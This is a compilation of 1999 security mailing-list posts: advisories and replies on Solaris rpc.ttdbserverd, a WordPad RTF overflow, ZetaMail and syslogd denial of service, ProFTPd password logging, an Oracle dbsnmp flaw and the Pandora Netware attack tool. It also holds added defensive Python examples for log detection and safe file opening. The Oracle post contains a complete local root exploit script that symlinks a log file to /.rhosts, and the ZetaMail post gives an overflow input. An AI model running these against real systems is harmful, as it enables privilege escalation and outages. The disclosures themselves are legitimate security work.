Re: rpc.ttdbserverd on solaris 7 In-reply-to: Your message of Tue, 16 Nov 1999 14:34:41 PST. 3831DC01.BFE5B400@nis.acs.uci.edu
After talking to Casper and Dan Stronberg, it seems the issue he is seeing is Sun BugID 4204015 "dbserver SEGVs when rpc function 15 is called with garbage". This vulnerability in Solaris 7 seems to be triggered by the old rpc.ttdbserverd exploit. Please note that an attacker can't make rpc.ttdbserverd execute code. It can simply make it crash (dereferencing a NULL pointer). The problem is fixed by Patch-ID# 107893-02.

So no, Solaris 7 is not vulnerable to the old rpc.ttdbserverd exploit in as much as it will only crash the service, not execute code in the target system.

Also note that although the patch is not in the recommended patch list, it is in the security patch list, which in effect makes it public.

--
Elias Levy
Security Focus
http://www.securityfocus.com/
Re: rpc.ttdbserverd on solaris 7
] We recently had mass attempts at breaking into our systems through
] rpc.ttdbserverd.

] Some of the rpc.ttdbserverd's dumped core, including at least one on
] solaris 7.

] Some of our systems with noexec_user_stack and noexec_user_stack_log
] reported attempts to execute code on the stack. Needless to say, this
] is worrisome.

] The messages logged look like:

] Nov 12 18:47:01 foo.bar.baz /usr/dt/bin/rpc.ttdbserverd[646]:
] _Tt_file_system::findBestMountPoint -- max_match_entry is null,
] aborting...
] Nov 12 18:47:01 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd:
] Segmentation Fault - core dumped
] Nov 12 18:47:02 foo.bar.baz unix: rpc.ttdbserverd[1932] attempt to
] execute code on stack by uid 0
] Nov 12 18:47:02 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd:
] Segmentation Fault - core dumped
] Nov 12 18:47:03 foo.bar.baz unix: rpc.ttdbserverd[1934] attempt to
] execute code on stack by uid 0
] Nov 12 18:47:03 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd:
] Segmentation Fault - core dumped

] We looked at the situation a bit more, and discovered that there is an
] rpc.ttdbserverd patch for Solaris 7 (107893-02), but it actually isn't
] on the recommended patch list for some reason.

] Does this patch fix the vulnerability I've described?

Yes, the Solaris 7 patch 107893-02 does fix the core dump problem. The core dump is not caused by a stack overflow, but by a NULL pointer dereference. We do always recommend that users install the latest recommended and security patch sets for your version of Solaris.

] If yes, why would it not be recommended?

It is on the current recommended patch list, I confirmed this at:

ftp://sunsolve.Sun.COM/pub/patches/Solaris7.PatchReport

Patch-ID# 107893-02
Synopsis: OpenWindows 3.6.1: Tooltalk patch
BugId's fixed with this patch: 4229531 4153078 4204015 4260867
Changes incorporated in this version: 4204015 4260867
Date: Sep/27/99

] If not, is a patch forthcoming?

See above.
Best regards, Brent Paulson [EMAIL PROTECTED]
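As an added example (not part of either message above), a small Python checker for the syslog pattern the thread describes: rpc.ttdbserverd core dumps reported by inetd, and the kernel's noexec_user_stack_log message naming rpc.ttdbserverd. The sample lines are constructed after the excerpt quoted above; host name and PIDs are illustrative.

```python
import re

# Constructed sample, modelled on the syslog excerpt quoted in the thread.
SAMPLE_LOG = """\
Nov 12 18:47:01 foo.bar.baz /usr/dt/bin/rpc.ttdbserverd[646]: _Tt_file_system::findBestMountPoint -- max_match_entry is null, aborting...
Nov 12 18:47:01 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd: Segmentation Fault - core dumped
Nov 12 18:47:02 foo.bar.baz unix: rpc.ttdbserverd[1932] attempt to execute code on stack by uid 0
Nov 12 18:47:02 foo.bar.baz inetd[143]: /usr/dt/bin/rpc.ttdbserverd: Segmentation Fault - core dumped
Nov 12 18:47:03 foo.bar.baz sendmail[201]: NOQUEUE: connection from mail.example.org
"""

# Classic BSD syslog layout: "Mon DD HH:MM:SS host tag[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<tag>[^\s:\[]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
# inetd reporting the child it spawned dying on a signal
CORE_RE = re.compile(r"rpc\.ttdbserverd: Segmentation Fault - core dumped")
# the kernel's noexec_user_stack_log message
STACK_RE = re.compile(
    r"(?P<proc>\S+)\[(?P<pid>\d+)\] attempt to execute code on stack by uid (?P<uid>\d+)")


def analyze(lines):
    """Return a per-host summary of ttdbserverd core dumps and blocked stack execution."""
    report = {}
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue  # not a syslog line we understand
        host = report.setdefault(m["host"], {"core_dumps": 0, "stack_exec": 0, "alerts": []})
        tag, msg = m["tag"], m["msg"]
        if tag == "inetd" and CORE_RE.search(msg):
            host["core_dumps"] += 1
        elif tag == "unix":
            s = STACK_RE.search(msg)
            if s and s["proc"] == "rpc.ttdbserverd":
                host["stack_exec"] += 1
                host["alerts"].append(
                    f"{m['ts']} noexec_user_stack blocked rpc.ttdbserverd "
                    f"pid {s['pid']} (uid {s['uid']})")
    return report


def suspicious_hosts(report, min_core_dumps=2):
    """Hosts worth a look: any blocked stack execution, or repeated ttdbserverd core dumps."""
    return sorted(h for h, r in report.items()
                  if r["stack_exec"] > 0 or r["core_dumps"] >= min_core_dumps)


if __name__ == "__main__":
    rep = analyze(SAMPLE_LOG.splitlines())
    for h in suspicious_hosts(rep):
        print(h, rep[h]["core_dumps"], "core dumps;", *rep[h]["alerts"], sep="\n  ")
```

A single core dump without the kernel message is consistent with the NULL-pointer crash the thread describes; the noexec_user_stack line is the one that shows someone actually sent a return-into-stack payload.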
Re: WordPad/riched20.dll buffer overflow
Pauli Ojanpera wrote:

> Just if someone needs to know...
>
> Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer overflow problem with ".rtf"-files.
>
> Crashme.rtf : {\rtf\}
>
> A malicious document may probably abuse this to execute arbitrary code. WordPad crashes with EIP=41414141.
>
> Someone else do deeper investigation since I don't care to.

I've been trying to determine if it's exploitable, and couldn't reproduce what you described. I want to know if there is some other information I need to know... here is what I tried:

an rtf file with {\rtf\A...} and a lot of As (tried 32, 49, 1000, 2000, ... 5000 ... 2). Nothing happened until 5000, where I got a crash, but not with EIP == 0x41414141 but with ESI == 0x41414141 on a 'push [esi]'. ESI was copied previously from the stack, but on the stack there were only 4 As here, 8 As there, and so... Then on 1 As I got a different crash, with EDI == 0x41414141, but never got EIP == 0x41414141. Anyway, it MAY be exploitable, but doesn't look simple...

Then I tried a different approach: I got http://www.securityfocus.com, I used a real rtf file and appended the same amount (32, 49, ...) of As after the first '\', but got exactly the same results...

Could anybody reproduce this bug?

richie

--
A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0
Research and Development - CoreLabs - Core SDI (Information Security)
http://www.core-sdi.com
---
For a personal reply use [EMAIL PROTECTED]
Re: Tektronix PhaserLink Webserver Reveals Admin Password
Here are a couple more problems with the Tektronix webserver services:

And one more: Even in absence of any sort of password- (or password hash-) acquiring attack, it's still possible to use up all of someone's consumables without a password at all -- No trickery required! [Keep in mind that a toner set for a 780 is ~ $600]

The "configure settings" page (http://printer/button_config.html) has a drop-down menu that allows you to print a number of different pages (test pages, color samples, startup page). This menu, and the functions it performs, do not require a password of any sort. Go to the page, select "CMYK Sampler Prints", click the button, and sit back while 32 pages of toner and paper go away.

[I reported this to Tektronix more than 6 months ago, at the same time I reported a printer-crashing bug. They fell all over themselves to fix the crashing bug (with some of the best support I'd ever gotten ... good job!), but seemed truly uninterested in stopping random people from being able to consume one's toner.]

Me, I just firewall my damned printer.

-WW
Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability
PROBLEM

UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP Server. The buffer overflow is caused by a long user name/password, 3500 characters. There is not much to expand on, just a simple hole.

Example:

[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 4294764405.063903189415041@itsme
USER (buffer)
+OK Send password
PASS (buffer)

Overflow Crash.

Where (buffer) is 3500 characters.

Binary / Source for the D.o.S for Windows / Linux: http://www.ussrback.com/zmail/

Vendor Status: Contacted.

Credit: USSRLABS

SOLUTION

Install another program from the same vendor, MsgCore/95 2.11, MsgCore/NT 2.10.

u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
http://www.ussrback.com
ProFTPd - mod_sqlpw.c
A member of the proftpd mailing list and myself discovered a problem with proftpd with the mod_sqlpw.c optional module compiled in. The Unix last command reveals passwords where the username should be. A patch was sent to the mailing list; however, the patch only protects ftp localhost, not ftp remotehost. Johnie Ingram (Author of mod_sqlpw.c) was notified, as well as the rest of the mailing list.

I suggest the following work around:

<Global>
WtmpLog off
</Global>

WtmpLog details below:

WtmpLog
Syntax: WtmpLog on|off|NONE
Default: WtmpLog on
Context: server config, <VirtualHost>, <Anonymous>, <Global>
Compatibility: 1.1.7 and later

The WtmpLog directive controls proftpd's logging of ftp connections to the host system's wtmp file (used by such commands as `last'). By default, all connections are logged via wtmp.

_Todd
local users can panic linux kernel (was: SuSE syslogd advisory)
The impact of the syslogd Denial Of Service vulnerability seems to be bigger than expected. I found that syslog could not be stopped from responding by one or a few connections, since it uses select() calls to synchronously manage the connections to /dev/log. I made an attempt with the attached test code, which makes about 2000 connects to syslog, using multiple processes, and my system instantly died with the message:

'Kernel panic: can't push onto full stack'

I've been able to reproduce this as a non-root user, although it had to be done two times to overcome the stronger user resource limits, but it worked. This has been tested with linux 2.0.38+syslog1.3 (redhat 5.2). As a temporary fix, I'd strongly advise everyone who hasn't to set proper user resource limits, but that is only a very temporary fix.

Taking a guess, I would say that the panic is caused by instability of the linux select() implementation, and could therefore be abused in other programs that manage an unlimited amount of connections using the select syscall.

Mixter
[EMAIL PROTECTED]
members.tripod.com/mixtersecurity

On Thu, 18 Nov 1999, Thomas Biege wrote:

_
SuSE Security Announcement - syslogd (a1)

Package: syslogd-1.3.33 (a1)
Date: Thu Nov 18 14:00:29 CET 1999
Affected SuSE versions: 6.2 and 6.3
Vulnerability Type: local denial-of-service attack
SuSE default package: yes
Other affected systems: all Linux systems using the syslog daemon
__

A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue.

Please note that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package.
_
1. Problem Description

The syslogd server uses a Unix Domain stream socket (/dev/log) for receiving local log messages via syslog(3). Unix Domain stream sockets are not connectionless, which means that one process is needed to serve one client.

2. Impact

By opening a lot of local syslog connections a user could stop the system from responding.

3. Solution

Update the package from our FTP server.
__

Please verify these md5 checksums of the updates before installing:

c9a9e0f8fc4e29daf30f8a735ae333ab  syslogd-1.3.33-9.alpha.rpm (AXP, 6.1)
3104e26a8b474e215ed703b7c4d4      syslogd-1.3.33-9.i386.rpm (x86, 5.3)
a13be12a75232f2f62f51fb1cae26fc0  syslogd-1.3.33-9.i386.rpm (x86, 6.1)
fc29df9455288f40eb1e8dbd0f47d5b3  syslogd-1.3.33-9.i386.rpm (x86, 6.2)
869b7fedd5b52807f12b7f66e282002c  syslogd-1.3.33-9.i386.rpm (x86, 6.3)
__

You can find updates on our ftp-Server:

ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/syslogd-1.3.33-9.alpha.rpm
ftp://ftp.suse.com/pub/suse/i386/update/5.3/a1/syslogd-1.3.33-9.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/syslogd-1.3.33-9.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/syslogd-1.3.33-9.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/a1/syslogd-1.3.33-9.i386.rpm

or try the following web pages for a list of mirrors:

http://www.suse.de/de/support/download/ftp/inland.html
http://www.suse.de/de/support/download/ftp/ausland.html

Our webpage for patches:
http://www.suse.de/de/support/download/updates/index.html

Our webpage for security announcements:
http://www.suse.de/de/support/security/index.html

If you want to report vulnerabilities, please contact [EMAIL PROTECTED]
__

SuSE has got two free security mailing list services to which any interested party may subscribe:

[EMAIL PROTECTED] - moderated and for general/linux/SuSE security discussions. All SuSE security announcements are sent to this list.

[EMAIL PROTECTED] - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list.
To subscribe to the list, send a message to: [EMAIL PROTECTED]
To remove your address from the list, send a message to: [EMAIL
Notifying Vendors
With the bit of talk of notifying vendors in the past day or two, I thought I might throw in my $0.02 and how I do things.

Notification and how long you wait for response should be dependent on usage of the software. For example, the WU-FTPD hole in 2.5.0. No exploit has been released to date, even though 2.6.0 is out. It's a widespread package that would affect a LOT of systems if the exploit was just tossed out without giving the vendors time to come up with at least a temporary fix better than "disable FTP".

I believe that notification is _almost_ always necessary (except in rare cases like my Alibaba CGI bugs, because Alibaba had already demonstrated their lack of interest in security of their software).

So basically what I'm trying to say is the time you wait for a response from the vendor (and/or a patch released) should depend on the severity of the hole and how widespread it will be.

-Kerb-
Re: WordPad/riched20.dll buffer overflow
This bug is also present in Microsoft's flagship operating system Windows 2000.

On Thu, 18 Nov 1999, Pauli Ojanpera wrote:

> Just if someone needs to know...
>
> Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer overflow problem with ".rtf"-files.
>
> Crashme.rtf : {\rtf\}
>
> A malicious document may probably abuse this to execute arbitrary code. WordPad crashes with EIP=41414141.
>
> Someone else do deeper investigation since I don't care to.
Potential vulnerability in Oracle
Hi Brock

Your note concerning a possible security vulnerability in Oracle (text below) was forwarded to me. This vulnerability has indeed been diagnosed and fixed already. Here is the scoop on where you can obtain fixes:

SUPPORTED CUSTOMERS: The alert and 5 patches are posted on metalink:
- URL: http://metalink.oracle.com/

UNSUPPORTED CUSTOMERS: The alert and 5 patches are posted on OTN:
- URL: http://technet.oracle.com/

This was also issued as an ISS alert.

Regarding your comment about reporting these issues to Oracle, we do have an internal process in place for expediting the way we handle potential security vulnerabilities, but we believe it's best to have all potential bugs come through Oracle World Wide Support first, after which they are diagnosed, and expedited as required.

Thank you for your interest in Oracle and security.

Yours very truly,
Mary Ann Davidson

~~
Mary Ann Davidson
Group Product Manager, Security
Server Technologies
Oracle Corporation
(650) 506 5464
~~
No ka moana ku'u mele; no na halu au e hula ai.
"From the ocean comes my song; of the waves I dance my dance."
~~

OVERVIEW

A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user to obtain root privileges.

BACKGROUND

My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition. This shouldn't make any difference, however, and I would consider any UNIX Oracle implementation to be exploitable.

DETAILS

When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by default) will dump two log files out into pwd, dbsnmpc and dbsnmpt. If these files do not exist, dbsnmpd will attempt to create them mode 666 and dump around 400 bytes of uncontrollable output into them. If the files do exist, dbsnmp will append these 400 bytes but not change the permissions. Thus if root does not have an .rhosts file, we can obtain root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts.
One thing to note about the exploit is that on my particular implementation, a normal user does not have read access above /product/ in the Oracle path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp). This won't prevent you from running the exploit since the execute bit is set for world on all of Oracle's directories, but you may have to guess about the location of dbsnmp. This can usually be done by examining the process list for Oracle entries.

EDITORIAL

One small rant about Oracle is their ridiculously complicated bug reporting scheme, which asks you 2814 questions and allows you ONE line of text to explain your problem. In this day and age, I don't understand why every major software vendor doesn't have something as simple as a mailto [EMAIL PROTECTED] SOMEWHERE on their site. In fact, when I searched Oracle's web page, I got zero hits on the word "security". Perhaps this address does exist and a bugtraq reader would care to enlighten me.

EXPLOIT

oracle8% uname -a; id
SunOS oracle8 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10
uid=102(btellier) gid=10(staff)
oracle8% /tmp/oracle.sh
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462
#

--- oracle.sh ---
#!/bin/sh
# Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others
# You'll probably have to change your path to dbsnmp
# Exploit will only work if /.rhosts does NOT exist
#
# Brock Tellier [EMAIL PROTECTED]

cd /tmp
unset ORACLE_HOME
umask
ln -s /.rhosts /tmp/dbsnmpc.log
/u01/app/oracle/product/8.1.5/bin/dbsnmp
echo "+ +" >> /.rhosts
rsh -l root localhost 'sh -i'
rsh -l root localhost rm /tmp/*log*
rsh -l root localhost rm /.rhosts
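As an added example, not code from either message or from Oracle, here is how a privileged program should open its log files so that the symlink trick described above fails: exclusive creation, no symlink following, mode 0600, and an ownership and identity check on anything already sitting at that name. The file names are constructed stand-ins for dbsnmpc.log and /.rhosts.

```python
import os
import stat
import tempfile


def open_log_safely(path):
    """Create or append to a private log file without ever following a symlink.

    Each step is the inverse of the dbsnmp behaviour described above (log
    created in the current directory, mode 666, through whatever was already
    sitting at that name).
    """
    flags = os.O_WRONLY | os.O_APPEND | getattr(os, "O_NOFOLLOW", 0)
    try:
        # O_EXCL: fail if *anything* already exists at path, a symlink included.
        return os.open(path, flags | os.O_CREAT | os.O_EXCL, 0o600)
    except OSError:
        pass  # something is there already; inspect it before touching it
    st = os.lstat(path)  # lstat() looks at the link itself, not its target
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError(f"{path} is a symlink; refusing to write through it")
    if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
        raise PermissionError(f"{path} is not a regular file owned by this user")
    fd = os.open(path, flags)
    fst = os.fstat(fd)  # re-check the opened object: defeats a swap between lstat() and open()
    if (fst.st_dev, fst.st_ino) != (st.st_dev, st.st_ino):
        os.close(fd)
        raise PermissionError(f"{path} changed between check and open")
    return fd


def demo(workdir):
    """Plant a symlink named like dbsnmp's log file and show the write is refused."""
    victim = os.path.join(workdir, "victim_rhosts")   # constructed stand-in for /.rhosts
    trap = os.path.join(workdir, "dbsnmpc.log")       # the name the attacker links
    os.symlink(victim, trap)
    try:
        open_log_safely(trap)
        blocked = False
    except PermissionError:
        blocked = not os.path.exists(victim)          # nothing appeared at the link target
    # The honest case: create the second log, then append to it on a later run.
    real = os.path.join(workdir, "dbsnmpt.log")
    for _ in range(2):
        fd = open_log_safely(real)
        os.write(fd, b"startup\n")
        os.close(fd)
    st = os.stat(real)
    return blocked, stat.S_IMODE(st.st_mode), st.st_size


def run_demo():
    with tempfile.TemporaryDirectory() as d:
        return demo(d)


if __name__ == "__main__":
    print(run_demo())  # -> (True, 384, 16): blocked, mode 0600, two appended lines
```

The same reasoning applies to any set-uid program that writes relative to the caller's working directory; the safer fix still is to write only under a directory the program owns.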
Pandora v4 Beta 2 Software
___
Nomad Mobile Research Centre
A N N O U N C E M E N T
www.nmrc.org
Simple Nomad [[EMAIL PROTECTED]]
19Nov1999
___

Product : Pandora v4.0 Beta 2
Platform : Windows 95/98/NT
           X on Linux

Jitsu-Disk has been very, very busy. Pandora v4.0 beta software has been updated. The new Pandora v4.0 *Beta 2* software is now available. It still has the "point, click, and attack" GUI interface, it still runs under Windows 95/98/NT or Linux with X, it still is the full metal jacket ninja kungfu action software for hacking Netware you've grown to love. Still compiled with 100% freeware compilers using freeware libraries with no big corporation SDK assistance, still the same GUI in Windows or Linux.

The GUI interface contains these features:

* Offline and Online components. Offline for cracking passwords offline, and Online for direct server attacks.
* Improved MGUI interface.

Offline includes:

* Password cracking of Netware 4.x and 5.x passwords.
* Reads native NDS files -- as well as maintenance files such as BACKUP.DS, BACKUP.NDS, and DSREPAIR.DIB -- and extracts password hashes for cracking.
* Reads Netware 4.x and 5.x versions of NDS, BACKUP.DS, and DSREPAIR.DIB.
* Multiple accounts can be brute forced and dictionary cracked simultaneously.
* Preset and user-definable keyspace for brute forcing.
* On screen sorting of account listings for easy viewing.
* Built-in NDS browser to look at all NDS objects.
* Remote Console Decryption using The Ruiner's decryption algorithm.
* Fully optimized for Pentium processors for maximum carnage.
* Bug fixes from Beta 1.

Online includes:

* Attach to servers using only the password hash (if you do not wish to crack them).
* Dictionary attacks against NDS objects that detect if Intruder Detection was triggered.
* Browse for target servers and gather connection info for spoofing attacks.
* GameOver spoofing attack against servers not using Level 3 packet signature.
* Improved Level3-1 attack which no longer requires using a sniffer to find elusive data for Admin session hijacking, just add in the Admin's MAC address and we do the rest.
* "Sniff-n-Grab" files being downloaded from the Netware server by unsuspecting users.
* Several nasty Denial of Service attacks.
* Improved packet drivers from Beta 1.
* Numerous bug fixes.
* Actual working code to attack from Linux. Requires an IPX-aware kernel and root access.

Full source code included in case you don't trust our binaries, and for adding your own code.

Windows software is available now and appears to be stable. Linux software is posted and works, but may be updated somewhat frequently over the next few days. The Online code for Linux is working but YMMV.

Check out binaries, code, doco, rants, and more at http://www.nmrc.org/pandora/
___
Re: WordPad/riched20.dll buffer overflow
> Just if someone needs to know...
>
> Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer overflow problem with ".rtf"-files.
>
> Crashme.rtf : {\rtf\}
>
> A malicious document may probably abuse this to execute arbitrary code. WordPad crashes with EIP=41414141.

I got my WordPad crashed with message:

The instruction at "0x61616161" referenced memory at "0x61616161". The memory could not be "read".

I press "OK" to close application, next message is:

The instruction at "0x5f8012b3" referenced memory at "0x0004". The memory could not be "read".

Then I have only "choice" to "terminate the application".

I use Windows NT (international English edition) + SP5.

Bronek Kozicki